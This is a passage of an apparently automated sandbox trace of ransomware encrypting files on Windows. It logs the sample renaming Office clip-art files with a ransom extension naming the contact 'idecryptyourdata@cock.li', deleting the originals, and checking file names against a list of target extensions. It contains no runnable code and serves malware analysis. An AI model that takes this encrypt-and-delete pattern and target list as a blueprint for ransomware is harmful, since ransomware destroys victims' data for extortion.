dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0064.382] GetLastError () returned 0x0 [0064.382] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2040, lpOverlapped=0x0) returned 1 [0064.387] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2050, lpOverlapped=0x0) returned 1 [0064.387] ReadFile (in: hFile=0x370, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.388] WriteFile (in: hFile=0x340, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.388] SetEndOfFile (hFile=0x340) returned 1 [0064.392] CloseHandle (hObject=0x340) returned 1 [0064.395] SetFilePointerEx (in: hFile=0x370, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.395] SetEndOfFile (hFile=0x370) returned 1 [0064.397] CloseHandle (hObject=0x370) returned 1 [0064.398] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.398] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00121_.wmf")) returned 1 [0064.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0064.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0064.398] lstrlenW (lpString=".doc") returned 4 [0064.399] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.399] lstrlenW (lpString=".docx") returned 5 [0064.399] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.399] lstrlenW (lpString=".pdf") returned 4 [0064.399] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.399] lstrlenW (lpString=".xls") returned 4 [0064.399] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.399] lstrlenW (lpString=".xlsx") returned 5 [0064.399] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.399] lstrlenW (lpString=".ppt") returned 4 [0064.399] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0064.399] lstrlenW (lpString=".zip") returned 4 [0064.399] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.399] lstrlenW (lpString=".rar") returned 4 [0064.399] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.399] lstrlenW (lpString=".bz2") returned 4 [0064.399] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.399] lstrlenW (lpString=".7z") returned 3 [0064.399] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0064.399] lstrlenW (lpString=".dbf") returned 4 [0064.399] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0064.399] lstrlenW (lpString=".1cd") returned 4 [0064.399] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00121_.WMF") returned 68 [0064.399] lstrlenW (lpString=".jpg") returned 4 [0064.399] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.401] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.401] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.401] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0064.401] GetLastError () returned 0x0 [0064.401] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xb10, lpOverlapped=0x0) returned 1 [0064.416] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xb20, lpOverlapped=0x0) returned 1 [0064.418] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.418] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.418] SetEndOfFile (hFile=0x354) returned 1 [0064.418] CloseHandle (hObject=0x354) returned 1 [0064.419] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.419] SetEndOfFile (hFile=0x368) returned 1 [0064.420] CloseHandle (hObject=0x368) returned 1 [0064.420] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.420] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00256_.wmf")) returned 1 [0064.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0064.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0064.421] lstrlenW (lpString=".doc") returned 4 [0064.421] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.421] lstrlenW (lpString=".docx") returned 5 [0064.421] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.421] lstrlenW (lpString=".pdf") returned 4 [0064.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.421] lstrlenW (lpString=".xls") returned 4 [0064.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.421] lstrlenW (lpString=".xlsx") returned 5 [0064.421] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.421] lstrlenW (lpString=".ppt") returned 4 [0064.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0064.421] lstrlenW (lpString=".zip") returned 4 [0064.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.421] lstrlenW (lpString=".rar") returned 4 [0064.421] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.421] lstrlenW (lpString=".bz2") returned 4 [0064.421] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.421] lstrlenW (lpString=".7z") returned 3 [0064.421] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0064.421] lstrlenW (lpString=".dbf") returned 4 [0064.421] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0064.421] lstrlenW (lpString=".1cd") returned 4 [0064.421] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0064.421] lstrlenW (lpString=".jpg") returned 4 [0064.421] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.422] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.422] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.422] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0064.422] GetLastError () returned 0x0 [0064.422] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x9456, lpOverlapped=0x0) returned 1 [0064.449] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x9460, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x9460, lpOverlapped=0x0) returned 1 [0064.451] ReadFile (in: hFile=0x368, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.451] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.451] SetEndOfFile (hFile=0x354) returned 1 [0064.458] CloseHandle (hObject=0x354) returned 1 [0064.466] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.466] SetEndOfFile (hFile=0x368) returned 1 [0064.468] CloseHandle (hObject=0x368) returned 1 [0064.470] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.470] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00261_.wmf")) returned 1 [0064.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0064.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0064.470] lstrlenW (lpString=".doc") returned 4 [0064.470] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.470] lstrlenW (lpString=".docx") returned 5 [0064.470] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.471] lstrlenW (lpString=".pdf") returned 4 [0064.471] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.471] lstrlenW (lpString=".xls") returned 4 [0064.471] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.471] lstrlenW (lpString=".xlsx") returned 5 [0064.471] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.471] lstrlenW (lpString=".ppt") returned 4 [0064.471] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0064.471] lstrlenW (lpString=".zip") returned 4 [0064.471] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.471] lstrlenW (lpString=".rar") returned 4 [0064.471] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.471] lstrlenW (lpString=".bz2") returned 4 [0064.471] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.471] lstrlenW (lpString=".7z") returned 3 [0064.471] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0064.471] lstrlenW (lpString=".dbf") returned 4 [0064.471] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0064.471] lstrlenW (lpString=".1cd") returned 4 [0064.471] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00261_.WMF") returned 68 [0064.471] lstrlenW (lpString=".jpg") returned 4 [0064.471] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.472] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.472] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.472] GetLastError () returned 0x0 [0064.472] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x44b0, lpOverlapped=0x0) returned 1 [0064.494] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x44c0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x44c0, lpOverlapped=0x0) returned 1 [0064.495] ReadFile (in: hFile=0x2c8, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.495] WriteFile (in: hFile=0x2c0, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.495] SetEndOfFile (hFile=0x2c0) returned 1 [0064.498] CloseHandle (hObject=0x2c0) returned 1 [0064.500] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.500] SetEndOfFile (hFile=0x2c8) returned 1 [0064.502] CloseHandle (hObject=0x2c8) returned 1 [0064.503] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.504] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00405_.wmf")) returned 1 [0064.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0064.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0064.504] lstrlenW (lpString=".doc") returned 4 [0064.504] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.504] lstrlenW (lpString=".docx") returned 5 [0064.504] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.504] lstrlenW (lpString=".pdf") returned 4 [0064.504] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.504] lstrlenW (lpString=".xls") returned 4 [0064.504] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.504] lstrlenW (lpString=".xlsx") returned 5 [0064.504] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.504] lstrlenW (lpString=".ppt") returned 4 [0064.504] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.504] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0064.504] lstrlenW (lpString=".zip") returned 4 [0064.504] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.505] lstrlenW (lpString=".rar") returned 4 [0064.505] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.505] lstrlenW (lpString=".bz2") returned 4 [0064.505] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.505] lstrlenW (lpString=".7z") returned 3 [0064.505] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0064.505] lstrlenW (lpString=".dbf") returned 4 [0064.505] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0064.505] lstrlenW (lpString=".1cd") returned 4 [0064.505] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.505] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 68 [0064.505] lstrlenW (lpString=".jpg") returned 4 [0064.505] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.505] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.505] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0064.506] GetLastError () returned 0x0 [0064.506] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xa79c, lpOverlapped=0x0) returned 1 [0064.516] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xa7a0, lpOverlapped=0x0) returned 1 [0064.517] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.517] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.517] SetEndOfFile (hFile=0x368) returned 1 [0064.517] CloseHandle (hObject=0x368) returned 1 [0064.519] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.519] SetEndOfFile (hFile=0x350) returned 1 [0064.520] CloseHandle (hObject=0x350) returned 1 [0064.520] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.520] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf")) returned 1 [0064.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0064.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0064.521] lstrlenW (lpString=".doc") returned 4 [0064.521] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.521] lstrlenW (lpString=".docx") returned 5 [0064.521] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.521] lstrlenW (lpString=".pdf") returned 4 [0064.521] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.521] lstrlenW (lpString=".xls") returned 4 [0064.521] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.521] lstrlenW (lpString=".xlsx") returned 5 [0064.521] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.521] lstrlenW (lpString=".ppt") returned 4 [0064.521] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0064.521] lstrlenW (lpString=".zip") returned 4 [0064.521] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.521] lstrlenW (lpString=".rar") returned 4 [0064.521] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.521] lstrlenW (lpString=".bz2") returned 4 [0064.521] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.521] lstrlenW (lpString=".7z") returned 3 [0064.521] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0064.521] lstrlenW (lpString=".dbf") returned 4 [0064.521] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0064.521] lstrlenW (lpString=".1cd") returned 4 [0064.521] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.521] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0064.521] lstrlenW (lpString=".jpg") returned 4 [0064.521] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.522] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.522] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.522] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00419_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0064.523] GetLastError () returned 0x0 [0064.523] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2c8, lpOverlapped=0x0) returned 1 [0064.524] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2d0, lpOverlapped=0x0) returned 1 [0064.524] ReadFile (in: hFile=0x350, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.524] WriteFile (in: hFile=0x368, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.524] SetEndOfFile (hFile=0x368) returned 1 [0064.525] CloseHandle (hObject=0x368) returned 1 [0064.525] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.525] SetEndOfFile (hFile=0x350) returned 1 [0064.526] CloseHandle (hObject=0x350) returned 1 [0064.526] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00419_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.526] DeleteFileW (lpFileName="C:\\Program 